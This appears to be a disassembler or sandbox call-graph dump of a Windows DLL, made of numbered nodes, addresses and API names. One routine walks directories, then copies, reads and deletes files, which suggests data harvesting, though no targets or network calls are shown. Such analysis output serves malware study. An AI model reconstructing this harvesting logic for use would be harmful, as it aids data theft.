6581 21f5695b 6580->6581 6582 21f57011 26 API calls 6581->6582 6583 21f56979 6582->6583 6584 21f568a9 6583->6584 6585 21f5571e _free 20 API calls 6583->6585 6586 21f568bd 6584->6586 6585->6584 6603 21f556b9 RtlLeaveCriticalSection 6586->6603 6588 21f568c7 6588->6575 6590 21f57022 6589->6590 6594 21f5701e 6589->6594 6591 21f57029 6590->6591 6596 21f5703c ___scrt_fastfail 6590->6596 6592 21f56368 _free 20 API calls 6591->6592 6593 21f5702e 6592->6593 6595 21f562ac ___std_exception_copy 26 API calls 6593->6595 6594->6579 6595->6594 6596->6594 6597 21f57073 6596->6597 6598 21f5706a 6596->6598 6597->6594 6600 21f56368 _free 20 API calls 6597->6600 6599 21f56368 _free 20 API calls 6598->6599 6601 21f5706f 6599->6601 6600->6601 6602 21f562ac ___std_exception_copy 26 API calls 6601->6602 6602->6594 6603->6588 6605 21f55468 6604->6605 6606 21f5545a 6604->6606 6607 21f56368 _free 20 API calls 6605->6607 6606->6605 6611 21f5547f 6606->6611 6608 21f55470 6607->6608 6609 21f562ac ___std_exception_copy 26 API calls 6608->6609 6610 21f5547a 6609->6610 6610->6115 6611->6610 6612 21f56368 _free 20 API calls 6611->6612 6612->6608 6617 21f54fd7 6613->6617 6618 21f5500d 6613->6618 6614 21f55024 6615 21f5571e _free 20 API calls 6614->6615 6615->6617 6616 21f5571e _free 20 API calls 6616->6618 6617->6121 6618->6614 6618->6616 7045 21f55351 7046 21f55360 7045->7046 7047 21f55374 7045->7047 7046->7047 7049 21f5571e _free 20 API calls 7046->7049 7048 21f5571e _free 20 API calls 7047->7048 7050 21f55386 7048->7050 7049->7047 7051 21f5571e _free 20 API calls 7050->7051 7052 21f55399 7051->7052 7053 21f5571e _free 20 API calls 7052->7053 7054 21f553aa 7053->7054 7055 21f5571e _free 20 API calls 7054->7055 7056 21f553bb 7055->7056 6619 21f536d0 6620 21f536f0 @_EH4_CallFilterFunc@8 6619->6620 6621 21f536e2 6619->6621 6622 21f52ada _ValidateLocalCookies 5 API calls 6621->6622 6622->6620 6623 21f54bdd 6624 21f54bec 6623->6624 6625 21f54c08 6623->6625 6624->6625 6626 21f54bf2 6624->6626 6627 21f56d60 51 API calls 6625->6627 6628 21f56368 _free 20 API calls 6626->6628 6629 21f54c0f GetModuleFileNameA 6627->6629 6631 21f54bf7 6628->6631 6630 21f54c33 6629->6630 6646 21f54d01 6630->6646 6632 21f562ac ___std_exception_copy 26 API calls 6631->6632 6634 21f54c01 6632->6634 6638 21f54c66 6640 21f56368 _free 20 API calls 6638->6640 6639 21f54c72 6641 21f54d01 38 API calls 6639->6641 6645 21f54c6b 6640->6645 6642 21f54c88 6641->6642 6644 21f5571e _free 20 API calls 6642->6644 6642->6645 6643 21f5571e _free 20 API calls 6643->6634 6644->6645 6645->6643 6648 21f54d26 6646->6648 6650 21f54d86 6648->6650 6658 21f570eb 6648->6658 6649 21f54c50 6652 21f54e76 6649->6652 6650->6649 6651 21f570eb 38 API calls 6650->6651 6651->6650 6653 21f54e8b 6652->6653 6654 21f54c5d 6652->6654 6653->6654 6655 21f5637b __dosmaperr 20 API calls 6653->6655 6654->6638 6654->6639 6656 21f54eb9 6655->6656 6657 21f5571e _free 20 API calls 6656->6657 6657->6654 6661 21f57092 6658->6661 6662 21f554a7 __fassign 38 API calls 6661->6662 6663 21f570a6 6662->6663 6663->6648 5656 21f51c5b 5657 21f51c6b ___scrt_fastfail 5656->5657 5660 21f512ee 5657->5660 5659 21f51c87 5661 21f51324 ___scrt_fastfail 5660->5661 5662 21f513b7 GetEnvironmentVariableW 5661->5662 5686 21f510f1 5662->5686 5665 21f510f1 57 API calls 5666 21f51465 5665->5666 5667 21f510f1 57 API calls 5666->5667 5668 21f51479 5667->5668 5669 21f510f1 57 API calls 5668->5669 5670 21f5148d 5669->5670 5671 21f510f1 57 API calls 5670->5671 5672 21f514a1 5671->5672 5673 21f510f1 57 API calls 5672->5673 5674 21f514b5 lstrlenW 5673->5674 5675 21f514d9 lstrlenW 5674->5675 5685 21f514d2 5674->5685 5676 21f510f1 57 API calls 5675->5676 5677 21f51501 lstrlenW lstrcatW 5676->5677 5678 21f510f1 57 API calls 5677->5678 5679 21f51539 lstrlenW lstrcatW 5678->5679 5680 21f510f1 57 API calls 5679->5680 5681 21f5156b lstrlenW lstrcatW 5680->5681 5682 21f510f1 57 API calls 5681->5682 5683 21f5159d lstrlenW lstrcatW 5682->5683 5684 21f510f1 57 API calls 5683->5684 5684->5685 5685->5659 5687 21f51118 ___scrt_fastfail 5686->5687 5688 21f51129 lstrlenW 5687->5688 5699 21f52c40 5688->5699 5691 21f51177 lstrlenW FindFirstFileW 5693 21f511e1 5691->5693 5694 21f511a0 5691->5694 5692 21f51168 lstrlenW 5692->5691 5693->5665 5695 21f511c7 FindNextFileW 5694->5695 5696 21f511aa 5694->5696 5695->5694 5698 21f511da FindClose 5695->5698 5696->5695 5701 21f51000 5696->5701 5698->5693 5700 21f51148 lstrcatW lstrlenW 5699->5700 5700->5691 5700->5692 5702 21f51022 ___scrt_fastfail 5701->5702 5703 21f510af 5702->5703 5704 21f5102f lstrcatW lstrlenW 5702->5704 5705 21f510b5 lstrlenW 5703->5705 5717 21f510ad 5703->5717 5706 21f5106b lstrlenW 5704->5706 5707 21f5105a lstrlenW 5704->5707 5732 21f51e16 5705->5732 5718 21f51e89 lstrlenW 5706->5718 5707->5706 5710 21f51088 GetFileAttributesW 5712 21f5109c 5710->5712 5710->5717 5711 21f510ca 5713 21f51e89 5 API calls 5711->5713 5711->5717 5712->5717 5724 21f5173a 5712->5724 5714 21f510df 5713->5714 5737 21f511ea 5714->5737 5717->5696 5719 21f52c40 ___scrt_fastfail 5718->5719 5720 21f51ea7 lstrcatW lstrlenW 5719->5720 5721 21f51ed1 lstrcatW 5720->5721 5722 21f51ec2 5720->5722 5721->5710 5722->5721 5723 21f51ec7 lstrlenW 5722->5723 5723->5721 5725 21f51747 ___scrt_fastfail 5724->5725 5752 21f51cca 5725->5752 5728 21f5199f 5728->5717 5730 21f51824 ___scrt_fastfail _strlen 5730->5728 5772 21f515da 5730->5772 5733 21f51e29 5732->5733 5736 21f51e4c 5732->5736 5734 21f51e2d lstrlenW 5733->5734 5733->5736 5735 21f51e3f lstrlenW 5734->5735 5734->5736 5735->5736 5736->5711 5738 21f5120e ___scrt_fastfail 5737->5738 5739 21f51e89 5 API calls 5738->5739 5740 21f51220 GetFileAttributesW 5739->5740 5741 21f51235 5740->5741 5742 21f51246 5740->5742 5741->5742 5744 21f5173a 35 API calls 5741->5744 5743 21f51e89 5 API calls 5742->5743 5745 21f51258 5743->5745 5744->5742 5746 21f510f1 56 API calls 5745->5746 5747 21f5126d 5746->5747 5748 21f51e89 5 API calls 5747->5748 5749 21f5127f ___scrt_fastfail 5748->5749 5750 21f510f1 56 API calls 5749->5750 5751 21f512e6 5750->5751 5751->5717 5753 21f51cf1 ___scrt_fastfail 5752->5753 5754 21f51d0f CopyFileW CreateFileW 5753->5754 5755 21f51d55 GetFileSize 5754->5755 5756 21f51d44 DeleteFileW 5754->5756 5757 21f51ede 22 API calls 5755->5757 5761 21f51808 5756->5761 5758 21f51d66 ReadFile 5757->5758 5759 21f51d94 CloseHandle DeleteFileW 5758->5759 5760 21f51d7d CloseHandle DeleteFileW 5758->5760 5759->5761 5760->5761 5761->5728 5762 21f51ede 5761->5762 5764 21f5222f 5762->5764 5765 21f5224e 5764->5765 5768 21f52250 5764->5768 5780 21f5474f 5764->5780 5785 21f547e5 5764->5785 5765->5730 5767 21f52908 5769 21f535d2 __CxxThrowException@8 RaiseException 5767->5769 5768->5767 5792 21f535d2 5768->5792 5770 21f52925 5769->5770 5770->5730 5773 21f5160c _strcat _strlen 5772->5773 5774 21f5163c lstrlenW 5773->5774 5880 21f51c9d 5774->5880 5776 21f51655 lstrcatW lstrlenW 5777 21f51678 5776->5777 5778 21f5167e lstrcatW 5777->5778 5779 21f51693 ___scrt_fastfail 5777->5779 5778->5779 5779->5730 5795 21f54793 5780->5795 5783 21f5478f 5783->5764 5784 21f54765 5801 21f52ada 5784->5801 5790 21f556d0 __dosmaperr 5785->5790 5786 21f5570e 5814 21f56368 5786->5814 5788 21f556f9 RtlAllocateHeap 5789 21f5570c 5788->5789 5788->5790 5789->5764 5790->5786 5790->5788 5791 21f5474f __dosmaperr 7 API calls 5790->5791 5791->5790 5794 21f535f2 RaiseException 5792->5794 5794->5767 5796 21f5479f ___DestructExceptionObject 5795->5796 5808 21f55671 RtlEnterCriticalSection 5796->5808 5798 21f547aa 5809 21f547dc 5798->5809 5800 21f547d1 _abort 5800->5784 5802 21f52ae5 IsProcessorFeaturePresent 5801->5802 5803 21f52ae3 5801->5803 5805 21f52b58 5802->5805 5803->5783 5813 21f52b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5805->5813 5807 21f52c3b 5807->5783 5808->5798 5812 21f556b9 RtlLeaveCriticalSection 5809->5812 5811 21f547e3 5811->5800 5812->5811 5813->5807 5817 21f55b7a GetLastError 5814->5817 5818 21f55b93 5817->5818 5819 21f55b99 5817->5819 5836 21f55e08 5818->5836 5823 21f55bf0 SetLastError 5819->5823 5843 21f5637b 5819->5843 5825 21f55bf9 5823->5825 5824 21f55bb3 5850 21f5571e 5824->5850 5825->5789 5829 21f55bb9 5832 21f55be7 SetLastError 5829->5832 5830 21f55bcf 5863 21f5593c 5830->5863 5832->5825 5834 21f5571e _free 17 API calls 5835 21f55be0 5834->5835 5835->5823 5835->5832 5868 21f55c45 5836->5868 5838 21f55e2f 5839 21f55e47 TlsGetValue 5838->5839 5840 21f55e3b 5838->5840 5839->5840 5841 21f52ada _ValidateLocalCookies 5 API calls 5840->5841 5842 21f55e58 5841->5842 5842->5819 5848 21f56388 __dosmaperr 5843->5848 5844 21f563c8 5847 21f56368 _free 19 API calls 5844->5847 5845 21f563b3 RtlAllocateHeap 5846 21f55bab 5845->5846 5845->5848 5846->5824 5856 21f55e5e 5846->5856 5847->5846 5848->5844 5848->5845 5849 21f5474f __dosmaperr 7 API calls 5848->5849 5849->5848 5851 21f55752 _free 5850->5851 5852 21f55729 HeapFree 5850->5852 5851->5829 5852->5851 5853 21f5573e 5852->5853 5854 21f56368 _free 18 API calls 5853->5854 5855 21f55744 GetLastError 5854->5855 5855->5851 5857 21f55c45 __dosmaperr 5 API calls 5856->5857 5858 21f55e85 5857->5858 5859 21f55ea0 TlsSetValue 5858->5859 5860 21f55e94 5858->5860 5859->5860 5861 21f52ada _ValidateLocalCookies 5 API calls 5860->5861 5862 21f55bc8 5861->5862 5862->5824 5862->5830 5874 21f55914 5863->5874 5871 21f55c71 5868->5871 5873 21f55c75 __crt_fast_encode_pointer 5868->5873 5869 21f55c95 5872 21f55ca1 GetProcAddress 5869->5872 5869->5873 5870 21f55ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5870->5871 5871->5869 5871->5870 5871->5873 5872->5873 5873->5838 5875 21f55854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 5874->5875 5876 21f55938 5875->5876 5877 21f558c4 5876->5877 5878 21f55758 __dosmaperr 20 API calls 5877->5878 5879 21f558e8 5878->5879 5879->5834 5881 21f51ca6 _strlen 5880->5881 5881->5776 6664 21f520db 6666 21f520e7 ___DestructExceptionObject 6664->6666 6665 21f520f6 6666->6665 6667 21f52110 dllmain_raw 6666->6667 6670 21f5210b 6666->6670 6667->6665 6668 21f5212a 6667->6668 6677 21f51eec 6668->6677 6670->6665 6671 21f52177 6670->6671 6675 21f51eec 31 API calls 6670->6675 6671->6665 6672 21f51eec 31 API calls 6671->6672 6673 21f5218a 6672->6673 6673->6665 6674 21f52193 dllmain_raw 6673->6674 6674->6665 6676 21f5216d dllmain_raw 6675->6676 6676->6671 6678 21f51ef7 6677->6678 6679 21f51f2a dllmain_crt_process_detach 6677->6679 6680 21f51f1c dllmain_crt_process_attach 6678->6680 6681 21f51efc 6678->6681 6682 21f51f06 6679->6682 6680->6682 6683 21f51f01 6681->6683 6684 21f51f12 6681->6684 6682->6670 6683->6682 6687 21f5240b 6683->6687 6692 21f523ec 6684->6692 6700 21f553e5 6687->6700 6811 21f53513 6692->6811 6694 21f523f5 6694->6682 6698 21f52408 6698->6682 6699 21f5351e 7 API calls 6699->6694 6706 21f55aca 6700->6706 6703 21f5351e 6782 21f53820 6703->6782 6705 21f52415 6705->6682 6707 21f52410 6706->6707 6708 21f55ad4 6706->6708 6707->6703 6709 21f55e08 __dosmaperr 11 API calls 6708->6709 6710 21f55adb 6709->6710 6710->6707 6711 21f55e5e __dosmaperr 11 API calls 6710->6711 6712 21f55aee 6711->6712 6714 21f559b5 6712->6714 6715 21f559c0 6714->6715 6716 21f559d0 6714->6716 6720 21f559d6 6715->6720 6716->6707 6719 21f5571e _free 20 API calls 6719->6716 6721 21f559e9 6720->6721 6725 21f559ef 6720->6725 6723 21f5571e _free 20 API calls 6721->6723 6722 21f5571e _free 20 API calls 6724 21f559fb 6722->6724 6723->6725 6726 21f5571e _free 20 API calls 6724->6726 6725->6722 6727 21f55a06 6726->6727 6728 21f5571e _free 20 API calls 6727->6728 6729 21f55a11 6728->6729 6730 21f5571e _free 20 API calls 6729->6730 6731 21f55a1c 6730->6731 6732 21f5571e _free 20 API calls 6731->6732 6733 21f55a27 6732->6733 6734 21f5571e _free 20 API calls 6733->6734 6735 21f55a32 6734->6735 6736 21f5571e _free 20 API calls 6735->6736 6737 21f55a3d 6736->6737 6738 21f5571e _free 20 API calls 6737->6738 6739 21f55a48 6738->6739 6740 21f5571e _free 20 API calls 6739->6740 6741 21f55a56 6740->6741 6746 21f5589c 6741->6746 6752 21f557a8 6746->6752 6748 21f558c0 6749 21f558ec 6748->6749 6765 21f55809 6749->6765 6751 21f55910 6751->6719 6753 21f557b4 ___DestructExceptionObject 6752->6753 6760 21f55671 RtlEnterCriticalSection 6753->6760 6755 21f557be 6758 21f5571e _free 20 API calls 6755->6758 6759 21f557e8 6755->6759 6757 21f557f5 _abort 6757->6748 6758->6759 6761 21f557fd 6759->6761 6760->6755 6764 21f556b9 RtlLeaveCriticalSection 6761->6764 6763 21f55807 6763->6757 6764->6763 6766 21f55815 ___DestructExceptionObject 6765->6766 6773 21f55671 RtlEnterCriticalSection 6766->6773 6768 21f5581f 6774 21f55a7f 6768->6774 6770 21f55832 6778 21f55848 6770->6778 6772 21f55840 _abort 6772->6751 6773->6768 6775 21f55a8e __fassign 6774->6775 6777 21f55ab5 __fassign 6774->6777 6776 21f57cc2 __fassign 20 API calls 6775->6776 6775->6777 6776->6777 6777->6770 6781 21f556b9 RtlLeaveCriticalSection 6778->6781 6780 21f55852 6780->6772 6781->6780 6783 21f5382d 6782->6783 6787 21f5384b ___vcrt_freefls@4 6782->6787 6784 21f5383b 6783->6784 6788 21f53b67 6783->6788 6793 21f53ba2 6784->6793 6787->6705 6798 21f53a82 6788->6798 6790 21f53b81 6791 21f53b99 TlsGetValue 6790->6791 6792 21f53b8d 6790->6792 6791->6792 6792->6784 6794 21f53a82 try_get_function 5 API calls 6793->6794 6795 21f53bbc 6794->6795 6796 21f53bd7 TlsSetValue 6795->6796 6797 21f53bcb 6795->6797 6796->6797 6797->6787 6799 21f53aaa 6798->6799 6803 21f53aa6 __crt_fast_encode_pointer 6798->6803 6799->6803 6804 21f539be 6799->6804 6802 21f53ac4 GetProcAddress 6802->6803 6803->6790 6807 21f539cd try_get_first_available_module 6804->6807 6805 21f53a77 6805->6802 6805->6803 6806 21f539ea LoadLibraryExW 6806->6807 6808 21f53a05 GetLastError 6806->6808 6807->6805 6807->6806 6809 21f53a60 FreeLibrary 6807->6809 6810 21f53a38 LoadLibraryExW 6807->6810 6808->6807 6809->6807 6810->6807 6817 21f53856 6811->6817 6813 21f523f1 6813->6694 6814 21f553da 6813->6814 6815 21f55b7a __dosmaperr 20 API calls 6814->6815 6816 21f523fd 6815->6816 6816->6698 6816->6699 6818 21f53862 GetLastError 6817->6818 6819 21f5385f 6817->6819 6820 21f53b67 ___vcrt_FlsGetValue 6 API calls 6818->6820 6819->6813 6821 21f53877 6820->6821 6822 21f538dc SetLastError 6821->6822 6823 21f53ba2 ___vcrt_FlsSetValue 6 API calls 6821->6823 6828 21f53896 6821->6828 6822->6813 6824 21f53890 6823->6824 6825 21f538b8 6824->6825 6826 21f53ba2 ___vcrt_FlsSetValue 6 API calls 6824->6826 6824->6828 6827 21f53ba2 ___vcrt_FlsSetValue 6 API calls 6825->6827 6825->6828 6826->6825 6827->6828 6828->6822 7057 21f5a945 7059 21f5a96d 7057->7059 7058 21f5a9a5 7059->7058 7060 21f5a997 7059->7060 7061 21f5a99e 7059->7061 7062 21f5aa17 21 API calls 7060->7062 7066 21f5aa00 7061->7066 7064 21f5a99c 7062->7064 7067 21f5aa20 7066->7067 7068 21f5b19b __startOneArgErrorHandling 21 API calls 7067->7068 7069 21f5a9a3 7068->7069 6829 21f57bc7 6830 21f57bd3 ___DestructExceptionObject 6829->6830 6831 21f57c0a _abort 6830->6831 6837 21f55671 RtlEnterCriticalSection 6830->6837 6833 21f57be7 6834 21f57f86 __fassign 20 API calls 6833->6834 6835 21f57bf7 6834->6835 6838 21f57c10 6835->6838 6837->6833 6841 21f556b9 RtlLeaveCriticalSection 6838->6841 6840 21f57c17 6840->6831 6841->6840 6842 21f5a1c6 IsProcessorFeaturePresent 7070 21f58640 7073 21f58657 7070->7073 7074 21f58665 7073->7074 7075 21f58679 7073->7075 7076 21f56368 _free 20 API calls 7074->7076 7077 21f58681 7075->7077 7078 21f58693 7075->7078 7079 21f5866a 7076->7079 7080 21f56368 _free 20 API calls 7077->7080 7081 21f554a7 __fassign 38 API calls 7078->7081 7084 21f58652 7078->7084 7082 21f562ac ___std_exception_copy 26 API calls 7079->7082 7083 21f58686 7080->7083 7081->7084 7082->7084 7085 21f562ac ___std_exception_copy 26 API calls 7083->7085 7085->7084 7086 21f5af43 7087 21f5af4d 7086->7087 7088 21f5af59 7086->7088 7087->7088 7089 21f5af52 CloseHandle 7087->7089 7089->7088 7090 21f5284f 7093 21f52882 7090->7093 7096 21f53550 7093->7096 7095 21f5285d 7097 21f5355d 7096->7097 7101 21f5358a 7096->7101 7098 21f547e5 ___std_exception_copy 21 API calls 7097->7098 7097->7101 7099 21f5357a 7098->7099 7100 21f5544d ___std_exception_copy 26 API calls 7099->7100 7099->7101 7100->7101 7101->7095 7102 21f5724e GetProcessHeap 7103 21f52049 7104 21f52055 ___DestructExceptionObject 7103->7104 7105 21f520d3 7104->7105 7106 21f5207d 7104->7106 7116 21f5205e 7104->7116 7138 21f52639 IsProcessorFeaturePresent 7105->7138 7117 21f5244c 7106->7117 7109 21f52082 7126 21f52308 7109->7126 7110 21f520da 7112 21f52087 __RTC_Initialize 7129 21f520c4 7112->7129 7114 21f5209f 7132 21f5260b 7114->7132 7118 21f52451 ___scrt_release_startup_lock 7117->7118 7119 21f52455 7118->7119 7122 21f52461 7118->7122 7120 21f5527a _abort 20 API calls 7119->7120 7121 21f5245f 7120->7121 7121->7109 7123 21f5246e 7122->7123 7124 21f5499b _abort 28 API calls 7122->7124 7123->7109 7125 21f54bbd 7124->7125 7125->7109 7142 21f534c7 RtlInterlockedFlushSList 7126->7142 7128 21f52312 7128->7112 7144 21f5246f 7129->7144 7131 21f520c9 ___scrt_release_startup_lock 7131->7114 7133 21f52617 7132->7133 7134 21f5262d 7133->7134 7161 21f553ed 7133->7161 7134->7116 7139 21f5264e ___scrt_fastfail 7138->7139 7140 21f526f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7139->7140 7141 21f52744 ___scrt_fastfail 7140->7141 7141->7110 7143 21f534d7 7142->7143 7143->7128 7149 21f553ff 7144->7149 7150 21f55c2b 11 API calls 7149->7150 7151 21f52476 7150->7151 7152 21f5391b 7151->7152 7153 21f53925 7152->7153 7154 21f5354d 7152->7154 7156 21f53b2c 7153->7156 7154->7131 7157 21f53a82 try_get_function 5 API calls 7156->7157 7158 21f53b46 7157->7158 7159 21f53b5e TlsFree 7158->7159 7160 21f53b52 7158->7160 7159->7160 7160->7154 7172 21f574da 7161->7172 7164 21f53529 7165 21f53543 7164->7165 7166 21f53532 7164->7166 7165->7134 7167 21f5391b ___vcrt_uninitialize_ptd 6 API calls 7166->7167 7168 21f53537 7167->7168 7176 21f53972 7168->7176 7175 21f574f3 7172->7175 7173 21f52ada _ValidateLocalCookies 5 API calls 7174 21f52625 7173->7174 7174->7164 7175->7173 7177 21f5353c 7176->7177 7178 21f5397d 7176->7178 7180 21f53c50 7177->7180 7179 21f53987 RtlDeleteCriticalSection 7178->7179 7179->7177 7179->7179 7181 21f53c7f 7180->7181 7182 21f53c59 7180->7182 7181->7165 7182->7181 7183 21f53c69 FreeLibrary 7182->7183 7183->7182 7184 21f55348 7185 21f53529 ___vcrt_uninitialize 8 API calls 7184->7185 7186 21f5534f 7185->7186 7187 21f57b48 7197 21f58ebf 7187->7197 7191 21f57b55 7210 21f5907c 7191->7210 7194 21f57b7f 7195 21f5571e _free 20 API calls 7194->7195 7196 21f57b8a 7195->7196 7214 21f58ec8 7197->7214 7199 21f57b50 7200 21f58fdc 7199->7200 7201 21f58fe8 ___DestructExceptionObject 7200->7201 7234 21f55671 RtlEnterCriticalSection 7201->7234 7203 21f58ff3 7204 21f5905e 7203->7204 7206 21f59032 RtlDeleteCriticalSection 7203->7206 7235 21f5a09c 7203->7235 7248 21f59073 7204->7248 7208 21f5571e _free 20 API calls 7206->7208 7208->7203 7209 21f5906a _abort 7209->7191 7211 21f57b64 RtlDeleteCriticalSection 7210->7211 7212 21f59092 7210->7212 7211->7191 7211->7194 7212->7211 7213 21f5571e _free 20 API calls 7212->7213 7213->7211 7215 21f58ed4 ___DestructExceptionObject 7214->7215 7224 21f55671 RtlEnterCriticalSection 7215->7224 7217 21f58f77 7229 21f58f97 7217->7229 7220 21f58f83 _abort 7220->7199 7222 21f58e78 66 API calls 7223 21f58ee3 7222->7223 7223->7217 7223->7222 7225 21f57b94 RtlEnterCriticalSection 7223->7225 7226 21f58f6d 7223->7226 7224->7223 7225->7223 7232 21f57ba8 RtlLeaveCriticalSection 7226->7232 7228 21f58f75 7228->7223 7233 21f556b9 RtlLeaveCriticalSection 7229->7233 7231 21f58f9e 7231->7220 7232->7228 7233->7231 7234->7203 7236 21f5a0a8 ___DestructExceptionObject 7235->7236 7237 21f5a0ce 7236->7237 7238 21f5a0b9 7236->7238 7247 21f5a0c9 _abort 7237->7247 7251 21f57b94 RtlEnterCriticalSection 7237->7251 7239 21f56368 _free 20 API calls 7238->7239 7240 21f5a0be 7239->7240 7243 21f562ac ___std_exception_copy 26 API calls 7240->7243 7242 21f5a0ea 7252 21f5a026 7242->7252 7243->7247 7245 21f5a0f5 7268 21f5a112 7245->7268 7247->7203 7516 21f556b9 RtlLeaveCriticalSection 7248->7516 7250 21f5907a 7250->7209 7251->7242 7253 21f5a033 7252->7253 7254 21f5a048 7252->7254 7255 21f56368 _free 20 API calls 7253->7255 7259 21f5a043 7254->7259 7271 21f58e12 7254->7271 7256 21f5a038 7255->7256 7258 21f562ac ___std_exception_copy 26 API calls 7256->7258 7258->7259 7259->7245 7261 21f5907c 20 API calls 7262 21f5a064 7261->7262 7277 21f57a5a 7262->7277 7264 21f5a06a 7284 21f5adce 7264->7284 7267 21f5571e _free 20 API calls 7267->7259 7515 21f57ba8 RtlLeaveCriticalSection 7268->7515 7270 21f5a11a 7270->7247 7272 21f58e26 7271->7272 7273 21f58e2a 7271->7273 7272->7261 7273->7272 7274 21f57a5a 26 API calls 7273->7274 7275 21f58e4a 7274->7275 7299 21f59a22 7275->7299 7278 21f57a66 7277->7278 7279 21f57a7b 7277->7279 7280 21f56368 _free 20 API calls 7278->7280 7279->7264 7281 21f57a6b 7280->7281 7282 21f562ac ___std_exception_copy 26 API calls 7281->7282 7283 21f57a76 7282->7283 7283->7264 7285 21f5adf2 7284->7285 7286 21f5addd 7284->7286 7288 21f5ae2d 7285->7288 7292 21f5ae19 7285->7292 7287 21f56355 __dosmaperr 20 API calls 7286->7287 7289 21f5ade2 7287->7289 7290 21f56355 __dosmaperr 20 API calls 7288->7290 7291 21f56368 _free 20 API calls 7289->7291 7293 21f5ae32 7290->7293 7297 21f5a070 7291->7297 7472 21f5ada6 7292->7472 7295 21f56368 _free 20 API calls 7293->7295 7296 21f5ae3a 7295->7296 7298 21f562ac ___std_exception_copy 26 API calls 7296->7298 7297->7259 7297->7267 7298->7297 7300 21f59a2e ___DestructExceptionObject 7299->7300 7301 21f59a36 7300->7301 7302 21f59a4e 7300->7302 7324 21f56355 7301->7324 7303 21f59aec 7302->7303 7307 21f59a83 7302->7307 7305 21f56355 __dosmaperr 20 API calls 7303->7305 7308 21f59af1 7305->7308 7327 21f58c7b RtlEnterCriticalSection 7307->7327 7311 21f56368 _free 20 API calls 7308->7311 7309 21f56368 _free 20 API calls 7318 21f59a43 _abort 7309->7318 7313 21f59af9 7311->7313 7312 21f59a89 7314 21f59aa5 7312->7314 7315 21f59aba 7312->7315 7316 21f562ac ___std_exception_copy 26 API calls 7313->7316 7317 21f56368 _free 20 API calls 7314->7317 7328 21f59b0d 7315->7328 7316->7318 7320 21f59aaa 7317->7320 7318->7272 7322 21f56355 __dosmaperr 20 API calls 7320->7322 7321 21f59ab5 7379 21f59ae4 7321->7379 7322->7321 7325 21f55b7a __dosmaperr 20 API calls 7324->7325 7326 21f5635a 7325->7326 7326->7309 7327->7312 7329 21f59b34 7328->7329 7330 21f59b3b 7328->7330 7333 21f52ada _ValidateLocalCookies 5 API calls 7329->7333 7331 21f59b3f 7330->7331 7332 21f59b5e 7330->7332 7334 21f56355 __dosmaperr 20 API calls 7331->7334 7335 21f59baf 7332->7335 7336 21f59b92 7332->7336 7337 21f59d15 7333->7337 7338 21f59b44 7334->7338 7340 21f59bc5 7335->7340 7382 21f5a00b 7335->7382 7339 21f56355 __dosmaperr 20 API calls 7336->7339 7337->7321 7341 21f56368 _free 20 API calls 7338->7341 7345 21f59b97 7339->7345 7385 21f596b2 7340->7385 7343 21f59b4b 7341->7343 7346 21f562ac ___std_exception_copy 26 API calls 7343->7346 7348 21f56368 _free 20 API calls 7345->7348 7346->7329 7351 21f59b9f 7348->7351 7349 21f59bd3 7352 21f59bd7 7349->7352 7353 21f59bf9 7349->7353 7350 21f59c0c 7355 21f59c66 WriteFile 7350->7355 7356 21f59c20 7350->7356 7354 21f562ac ___std_exception_copy 26 API calls 7351->7354 7365 21f59ccd 7352->7365 7392 21f59645 7352->7392 7397 21f59492 GetConsoleCP 7353->7397 7354->7329 7360 21f59c89 GetLastError 7355->7360 7368 21f59bef 7355->7368 7357 21f59c56 7356->7357 7358 21f59c28 7356->7358 7423 21f59728 7357->7423 7361 21f59c46 7358->7361 7362 21f59c2d 7358->7362 7360->7368 7415 21f598f5 7361->7415 7362->7365 7408 21f59807 7362->7408 7365->7329 7367 21f56368 _free 20 API calls 7365->7367 7371 21f59cf2 7367->7371 7368->7329 7368->7365 7369 21f59ca9 7368->7369 7373 21f59cc4 7369->7373 7374 21f59cb0 7369->7374 7372 21f56355 __dosmaperr 20 API calls 7371->7372 7372->7329 7430 21f56332 7373->7430 7375 21f56368 _free 20 API calls 7374->7375 7377 21f59cb5 7375->7377 7378 21f56355 __dosmaperr 20 API calls 7377->7378 7378->7329 7471 21f58c9e RtlLeaveCriticalSection 7379->7471 7381 21f59aea 7381->7318 7435 21f59f8d 7382->7435 7457 21f58dbc 7385->7457 7387 21f596c2 7388 21f596c7 7387->7388 7389 21f55af6 _abort 38 API calls 7387->7389 7388->7349 7388->7350 7390 21f596ea 7389->7390 7390->7388 7391 21f59708 GetConsoleMode 7390->7391 7391->7388 7393 21f5966a 7392->7393 7396 21f5969f 7392->7396 7394 21f5a181 WriteConsoleW CreateFileW 7393->7394 7395 21f596a1 GetLastError 7393->7395 7393->7396 7394->7393 7395->7396 7396->7368 7405 21f594f5 7397->7405 7407 21f59607 7397->7407 7398 21f52ada _ValidateLocalCookies 5 API calls 7399 21f59641 7398->7399 7399->7368 7401 21f579e6 40 API calls __fassign 7401->7405 7402 21f5957b WideCharToMultiByte 7403 21f595a1 WriteFile 7402->7403 7402->7407 7404 21f5962a GetLastError 7403->7404 7403->7405 7404->7407 7405->7401 7405->7402 7406 21f595d2 WriteFile 7405->7406 7405->7407 7466 21f57c19 7405->7466 7406->7404 7406->7405 7407->7398 7409 21f59816 7408->7409 7410 21f598d8 7409->7410 7412 21f59894 WriteFile 7409->7412 7411 21f52ada _ValidateLocalCookies 5 API calls 7410->7411 7413 21f598f1 7411->7413 7412->7409 7414 21f598da GetLastError 7412->7414 7413->7368 7414->7410 7422 21f59904 7415->7422 7416 21f59a0f 7417 21f52ada _ValidateLocalCookies 5 API calls 7416->7417 7418 21f59a1e 7417->7418 7418->7368 7419 21f59986 WideCharToMultiByte 7420 21f59a07 GetLastError 7419->7420 7421 21f599bb WriteFile 7419->7421 7420->7416 7421->7420 7421->7422 7422->7416 7422->7419 7422->7421 7427 21f59737 7423->7427 7424 21f597ea 7425 21f52ada _ValidateLocalCookies 5 API calls 7424->7425 7429 21f59803 7425->7429 7426 21f597a9 WriteFile 7426->7427 7428 21f597ec GetLastError 7426->7428 7427->7424 7427->7426 7428->7424 7429->7368 7431 21f56355 __dosmaperr 20 API calls 7430->7431 7432 21f5633d _free 7431->7432 7433 21f56368 _free 20 API calls 7432->7433 7434 21f56350 7433->7434 7434->7329 7444 21f58d52 7435->7444 7437 21f59f9f 7438 21f59fa7 7437->7438 7439 21f59fb8 SetFilePointerEx 7437->7439 7440 21f56368 _free 